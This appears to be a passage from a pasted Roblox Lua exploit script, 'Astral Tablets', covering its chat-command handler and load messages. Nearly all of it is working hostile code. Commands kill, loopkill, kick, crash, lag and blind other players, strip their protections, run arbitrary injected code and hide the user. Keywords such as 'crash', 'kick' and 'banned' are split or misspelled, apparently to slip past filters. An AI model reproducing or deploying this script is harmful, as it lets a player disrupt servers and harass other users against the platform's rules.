  921.         elseif string.sub(cmd,1,6):lower() == "*unff " then
  922.         for i,v in pairs(game.Players:GetPlayers()) do
  923.             if string.find(v.Name,string.sub(cmd,7)) ~= nil then
  924.                 pcall(function() v.Character.ForceField:Destroy() end)
  925.             end
  926.         end
  927.         elseif cmd == "*names" then
  928.         names()
  929.         wait()
  930.         for i,v in pairs(_G) do
  931.             Output(player,v)
  932.         end
  933.         elseif cmd == "no ffs" or cmd == "*unffs" then
  934.         unff = true
  935.         while unff == true do wait()
  936.             for i,v in pairs(game.Workspace:GetChildren()) do
  937.                 for i,p in pairs(v:getChildren()) do
  938.                     if p:IsA("ForceField") then
  939.                         p:Destroy()
  940.                     end
  941.                 end
  942.             end
  943.         end
  944.         elseif cmd == "break" then
  945.         script.Disabled = true
  946.         elseif cmd == "fix" then
  947.         script.Disabled = true
  948.         wait()
  949.         script.Disabled = false
  950.         elseif string.sub(cmd,1,10):lower() == "*loopkill " then
  951.         for i,v in pairs(game.Players:getPlayers()) do
  952.             if string.find(v.Name,string.sub(cmd,11)) ~= nil then
  953.                 loopkill(v)
  954.             end
  955.         end
  956.         elseif cmd == "*ffs" then
  957.         unff = false
  958.         elseif cmd == "no epics" or cmd == "*weaks" then
  959.         weaks = true
  960.         while weaks == true do wait()
  961.             for i,v in pairs(game.Workspace:GetChildren()) do
  962.                 for i,p in pairs(v:GetChildren()) do
  963.                     if p:IsA("Humanoid") then
  964.                         p.MaxHealth = 100
  965.                     end
  966.                 end
  967.             end
  968.         end
  969.         elseif cmd == "*epics" then
  970.         weaks = false
  971.         elseif string.sub(cmd,1,7):lower() == "*blind " then
  972.         for i,v in pairs(game.Players:GetPlayers()) do
  973.             if string.find(v.Name,string.sub(cmd,8)) ~= nil then
  974.                 blind(v)
  975.             end
  976.         end
  977.         elseif string.sub(cmd,1,7):lower() == "*carry " then
  978.         for i,v in pairs(game.Workspace:GetChildren()) do
  979.             if string.find(v.Name,string.sub(cmd,8)) ~=  nil then
  980.                 coroutine.wrap(function()
  981.                     while true do
  982.                         v.Torso.CFrame = Camera.Focus * CFrame.new(0, 5, 0)
  983.                         wait()
  984.                     end
  985.                 end)()
  986.             end
  987.         end
  988.         elseif string.sub(cmd,1,7):lower() == "*asset " then
  989.         local asset = game:service'InsertService':GetService(string.sub(cmd,8))
  990.         asset.Parent = Character
  991.         elseif cmd == "*deepclean" then
  992.         serverclear()
  993.         elseif string.sub(cmd,1,9):lower() == "*uncarry " then
  994.         for i,v in pairs(game.Players:GetPlayers()) do
  995.             if string.find(v.Name,string.sub(cmd,10)) ~= nil then
  996.                 v.Character:BreakJoints()
  997.             end
  998.         end
  999.         elseif cmd == "test" then
  1000.         ash()
  1001.         elseif cmd == "*char" then
  1002.         probe = false
  1003.         plugin = false
  1004.         pcall(function() part:Destroy() end)
  1005.         pcall(function() Character:Destroy() end)
  1006.         wait()
  1007.         Output(player,"Loaded Character")
  1008.         wait(0.1)
  1009.         Output(player,"All Commands Working")
  1010.         wait(0.1)
  1011.         Output(player,"For commands, say '*cmds")
  1012.         wait(0.1)
  1013.         Output(player,"Version 6.5")
  1014.         wait(0.1)
  1015.         CheckDismiss()
  1016.         LoadChar()
  1017.         wait()
  1018.         nilplugin()
  1019.         elseif cmd == "*day" then
  1020.         game.Lighting.TimeOfDay = 14
  1021.         elseif cmd == "*night" then
  1022.         game.Lighting.TimeOfDay = 0
  1023.         elseif cmd == "*sd" then
  1024.         sd()
  1025.         elseif string.sub(cmd,1,7):lower() == "*allow " then
  1026.         for i,v in pairs(game.Players:getPlayers()) do
  1027.             if string.find(v.Name,string.sub(cmd,8)) ~= nil then
  1028.                 table.insert(allowed,v)
  1029.             end
  1030.         end
  1031.         elseif string.sub(cmd,1,13):lower() == "*clientcra".."sh " then
  1032.         for i,v in pairs(game:service("NetworkServer"):GetChildren()) do
  1033.             if string.find(v:GetPlayer().Name, string.sub(cmd,14)) ~= nil then
  1034.                 clientcraLsh(v)
  1035.             end
  1036.         end
  1037.         elseif string.sub(cmd,6):lower() == "*derp " then
  1038.         for i,v in pairs(game.Players:GetPlayers()) do
  1039.             if string.find(v.Name,string.sub(cmd,7)) ~= nil then
  1040.                 derpis(v)
  1041.             end
  1042.         end
  1043.         elseif string.sub(cmd,1,4):lower() == "*ds " then
  1044.         local thing = Instance.new("StringValue",workspace)
  1045.         thing.Name = "DS:"..string.sub(cmd,5)
  1046.         wait(1)
  1047.         thing:Destroy()
  1048.         elseif cmd == "test" then
  1049.         playerplugin1(player)
  1050.         wait()
  1051.         if player.Backpack:FindFirstChild("plugin") then
  1052.             Output(player,"Testing Activated")
  1053.         end
  1054.         elseif string.sub(cmd,5):lower() == "*lag " then
  1055.         for i,v in pairs(game.Players:GetPlayers()) do
  1056.             if string.find(v.Name,string.sub(cmd,6)) ~= nil then
  1057.                 lag(v)
  1058.             end
  1059.         end
  1060.         elseif string.sub(cmd,1,8):lower() == "*nillag " then
  1061.         for i,v in pairs(game.Workspace:GetChildren()) do
  1062.             if string.find(v.Name,string.sub(cmd,9)) ~= nil then
  1063.                 nillag(v)
  1064.             end
  1065.         end
  1066.         elseif cmd == "*unloopkill" then
  1067.         unloopkill()
  1068.         elseif string.sub(cmd,1,2):lower() == "l/" then
  1069.         local NS = ClonyPooPoo:Clone()
  1070.         local Source = NS:FindFirstChild("Source") or NS:FindFirstChild("DSource") or NS:FindFirstChild(SourceName)
  1071.         if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  1072.         Source.Value = [[
  1073.         ]]..string.sub(cmd,3)..[[
  1074.         ]]
  1075.         NS.Parent = Character
  1076.         NS.Disabled = false
  1077.         if NS.Parent == Character and NS.Disabled == false then
  1078.             Output(player,"Ran Local")
  1079.         end
  1080.         elseif string.sub(cmd,1,10):lower() == "*probenil " then
  1081.         for i,v in pairs(game.Workspace:GetChildren()) do
  1082.             if string.find(v.Name,string.sub(cmd,11)) ~= nil then
  1083.                 pcall(function() probenil(v) end)
  1084.             end
  1085.         end
  1086.         elseif string.sub(cmd,1,6):lower() == "*ki".."ck " then
  1087.         for i,v in pairs(game.Players:GetPlayers()) do
  1088.             if string.find(v.Name,string.sub(cmd,7)) ~= nil then
  1089.                 v:Destroy()
  1090.                 Output(player,"Ki".."cked:"..v.Name)
  1091.             end
  1092.         end
  1093.         elseif cmd == "*b" then
  1094.         local base = Instance.new("Part")
  1095.         base.Parent = game.Workspace
  1096.         base.BrickColor = BrickColor.new("Dark green")
  1097.         base.Position = Vector3.new(-14.5, 4.2, -48)
  1098.         base.Locked = true
  1099.         base.Anchored = true
  1100.         base.Name = "Base"
  1101.         base.Size = Vector3.new(2048,0.4,2048)
  1102.         base.TopSurface = "Smooth"
  1103.         local spawn = Instance.new("SpawnLocation")
  1104.         spawn.Parent = game.Workspace
  1105.         spawn.Position = Vector3.new(-14.5, 4.2, -48)
  1106.         spawn.BrickColor = BrickColor.new("Really black")
  1107.         spawn.Anchored = true
  1108.         spawn.TopSurface = "Smooth"
  1109.         spawn.Size = Vector3.new(5, 1.2, 5)
  1110.         spawn.TeamColor = Color3.new("Medium stone gray")
  1111.         spawn.CanCollide = true
  1112.         spawn.Locked = true
  1113.         spawn.Name = "SpawnLocation"
  1114.         elseif string.sub(cmd,1,6):lower() == "*kill " then
  1115.         for i,v in pairs(game.Players:GetChildren()) do
  1116.             if string.find(v.Name,string.sub(cmd,7)) ~= nil then
  1117.                 v.Character:BreakJoints()
  1118.                 Output(player,"Killed:"..v.Name)
  1119.                 CheckDismiss()
  1120.             end
  1121.         end
  1122.         elseif string.sub(cmd,1,7):lower() == "*cra".."sh " then
  1123.         local thing = Instance.new("StringValue",game.Lighting)
  1124.         thing.Name = "Crash:"..string.sub(cmd,8)
  1125.         wait(1)
  1126.         thing:destroy()
  1127.         elseif string.sub(cmd,1,5):lower() == "*pro " then
  1128.         local thing = Instance.new("StringValue",workspace)
  1129.         thing.Name = "Protect:"..string.sub(cmd,6)
  1130.         wait(1)
  1131.         thing:Destroy()
  1132.         elseif cmd == "*cmds" then
  1133.         for i,v in pairs(cmds) do
  1134.             wait(0.1)
  1135.             Output(player,v)
  1136.             wait(0.1)
  1137.             CheckDismiss()
  1138.         end
  1139.         elseif string.sub(cmd,1,7):lower() == "*admin " then
  1140.         for i,v in pairs(game.Players:GetPlayers()) do
  1141.             if string.find(v.Name,string.sub(cmd,8)) ~= nil then
  1142.                 admin(v)
  1143.                 Output(player,"Admin'd:"..v.Name)
  1144.                 CheckDismiss()
  1145.             end
  1146.         end
  1147.         elseif cmd == "*hide" then
  1148.         pcall(function() Character.Parent = game.Workspace.CurrentCamera end)
  1149.         pcall(function() part.Parent = game.Workspace.CurrentCamera end)
  1150.         wait()
  1151.         Output(player,"You are now hidden")
  1152.         elseif cmd == "*unhide" then
  1153.         pcall(function() Character.Parent = workspace end)
  1154.         wait()
  1155.         if Character.Parent == workspace then
  1156.             Output(player,"You are now unhidden")
  1157.         end
  1158.         elseif string.sub(cmd,1,6):lower() == "*ping " then
  1159.         if string.sub(cmd,7):lower() == "workspace" then
  1160.             for i,v in pairs(game.Workspace:children()) do
  1161.                 Output(player,v.Name.."("..v.className..")")
  1162.                 CheckDismiss()
  1163.             end
  1164.         end
  1165.         if string.sub(cmd,7):lower() == "players" then
  1166.             for i,v in pairs(players) do
  1167.                 for i,d in pairs(game.Players:GetPlayers()) do
  1168.                     if not d.Name == v then
  1169.                         wait(0.1)
  1170.                         Output(player,v.Name.."(nil)")
  1171.                         CheckDismiss()
  1172.                     else
  1173.                         wait(0.1)
  1174.                         Output(player,v.Name)
  1175.                         CheckDismiss()
  1176.                     end
  1177.                 end
  1178.             end
  1179.         end
  1180.         if string.sub(cmd,7):lower() == "connected" then
  1181.             for i,v in pairs(connected) do
  1182.                 wait(0.1)
  1183.                 Output(player,v.Name)
  1184.                 CheckDismiss()
  1185.             end
  1186.         end
  1187.         if string.sub(cmd,7):lower() == "BaLnned" then
  1188.             for i,v in pairs(BaLnned) do
  1189.                 if #v == 0 then
  1190.                     Output(player,"There are no BaLnned players.")
  1191.                 else
  1192.                     Output(player,v.Name)
  1193.                     CheckDismiss()
  1194.                 end
  1195.             end
  1196.         end
  1197.         elseif cmd == "names" then
  1198.         local thing = Instance.new("StringValue",game.Lighting)
  1199.         thing.Name = "Names"
  1200.         wait(1)
  1201.         thing:Destroy()
  1202.         for i,v in pairs(game.Lighting:GetChildren()) do
  1203.             if v:IsA("StringValue") then
  1204.                 Output(player,v.Name)
  1205.             end
  1206.         end
  1207.         elseif string.sub(cmd,1,7):lower() == "*speak " then
  1208.         Output(player,"Blitzorz:"..string.sub(cmd,8))
  1209.     end
  1210. end)
  1211. function test(func,args)
  1212.     args=type(args)=="table" and args or {args}
  1213.     local ran_fine,error_message=coroutine.resume(coroutine.create(func),unpack(args))
  1214.     if not ran_fine then
  1215.         local hint = Instance.new("Hint",workspace)
  1216.         hint.Text = error_message
  1217.         wait(30)
  1218.         hint:Destroy()
  1219.     end
  1220. end
  1221. game.Players.PlayerRemoving:connect(PlayerRemoving)
  1222. Output(player,"Loaded Astral Tablets")
  1223. wait(0.1)
  1224. Output(player,"Say '*probe' to activate your probe.")
  1225. wait(0.1)
  1226. Output(player,"Created by Blitzorz/jordan83221")
  1227. wait(0.1)
  1228. Output(player,"For commands, say '*cmds'")
  1229. wait(0.1)
  1230. Output(player,"When in probe mode, say '*char' to make your character.")
  1231. wait(0.1)
  1232. Output(player,"Version "..Version)
  1233. wait(0.1)
  1234. CheckDismiss()
Advertisement
Add Comment
Please, Sign In to add comment